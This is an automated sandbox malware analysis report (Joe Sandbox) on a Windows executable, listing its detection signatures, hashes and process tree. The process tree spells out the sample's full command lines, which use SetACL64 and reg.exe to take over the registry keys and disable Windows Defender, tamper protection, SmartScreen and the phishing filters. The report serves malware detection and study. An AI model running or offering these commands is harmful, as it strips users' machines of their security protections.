Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ms63nDrOBa.exe

Overview

General Information

Sample name:Ms63nDrOBa.exe
renamed because original name is a hash value
Original sample name:ad3a57927668a9560b5f01d7ff54c881.exe
Analysis ID:1472092
MD5:ad3a57927668a9560b5f01d7ff54c881
SHA1:d0c66b9b5e5f58baff91f23f91a67fd3e8359662
SHA256:efc2d3750186e0038a9bfb4e292298f92bce9f80d2af0a992a3e5fe0c9f29ecf
Tags:exe
Infos:

Detection

Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds extensions / path to Windows Defender exclusion list (Registry)
Disable Microsoft Windows Malicious Software Removal Tool Heartbeat Telemetry
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Disables the Smart Screen filter
Disables the phising filter of Microsoft Edge
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses cmd line tools excessively to alter registry or file data
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Windows Defender Exclusions Added - Registry
Too many similar processes found
Uses 32bit PE files
Uses reg.exe to modify the Windows registry

Classification

Process Tree

  • System is w10x64
  • Ms63nDrOBa.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\Ms63nDrOBa.exe" MD5: AD3A57927668A9560B5F01D7FF54C881)
    • cmd.exe (PID: 6184 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SetACL64.exe (PID: 4364 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
    • cmd.exe (PID: 1824 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • SetACL64.exe (PID: 1812 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 2420 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 3108 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 2704 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 5372 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 2812 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • SetACL64.exe (PID: 1176 cmdline: SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full" MD5: 1FB64FF73938F4A04E97E5E7BF3D618C)
      • reg.exe (PID: 6492 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2404 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6320 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5172 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6052 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4032 cmdline: reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5224 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5672 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4868 cmdline: reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3248 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6784 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5696 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6468 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4196 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3520 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3928 cmdline: reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3432 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 7124 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4364 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5052 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 6548 cmdline: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 2612 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1584 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 3108 cmdline: reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5948 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1592 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 616 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 1080 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 4904 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
      • reg.exe (PID: 5308 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Windows Defender Exclusions Added - Registry
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1080, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\DisableAutoExclusions

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exeReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\PowerRun64.exeVirustotal: Detection: 19%Perma Link
Multi AV Scanner detection for submitted file
Source: Ms63nDrOBa.exeReversingLabs: Detection: 28%
Source: Ms63nDrOBa.exeVirustotal: Detection: 33%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exeJoe Sandbox ML: detected
Machine Learning detection for sample
Source: Ms63nDrOBa.exeJoe Sandbox ML: detected
Source: Ms63nDrOBa.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Ms63nDrOBa.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: win_version_csharp.exe.0.dr
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: uxdabweej.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr

Change of critical system settings

barindex
Adds extensions / path to Windows Defender exclusion list (Registry)
Source: C:\Windows\SysWOW64\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions DisableAutoExclusions
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C40
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_00406891 FindFirstFileW,FindClose,0_2_00406891
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C17296D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C17296D0
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C175C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,4_2_00007FF7C175C76C
Source: C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exeCode function: 4_2_00007FF7C173CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF7C173CF15
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: PowerRun64.exe.0.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Ms63nDrOBa.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0O
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: PowerRun64.exe.0.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: PowerRun64.exe.0.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com
Source: SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com.
Source: SetACL64.exe, SetACL64.exe, 00000004.00000002.2140134461.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2139148802.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2144133422.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2143385127.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2144794323.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2145879994.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2146220599.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2147316022.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2151463967.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2147801505.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2152310864.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2153178276.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000000.2153676169.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000C.00000002.2154453959.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000000.2154984222.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000D.00000002.2156028330.00007FF7C176B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.drString found in binary or memory: https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
Source: Ms63nDrOBa.exe, 00000000.00000002.2284467700.0000000000789000.00000004.00000001.01000000.00000003.sdmp, SetACL64.exe.0.drString found in binary or memory: https://www.digicert.com/CPS0
Source: PowerRun64.exe.0.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: C:\Users\user\Desktop\Ms63nDrOBa.exeCode function: 0_2_004056F8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056F8
Source: reg.exeProcess created: 68
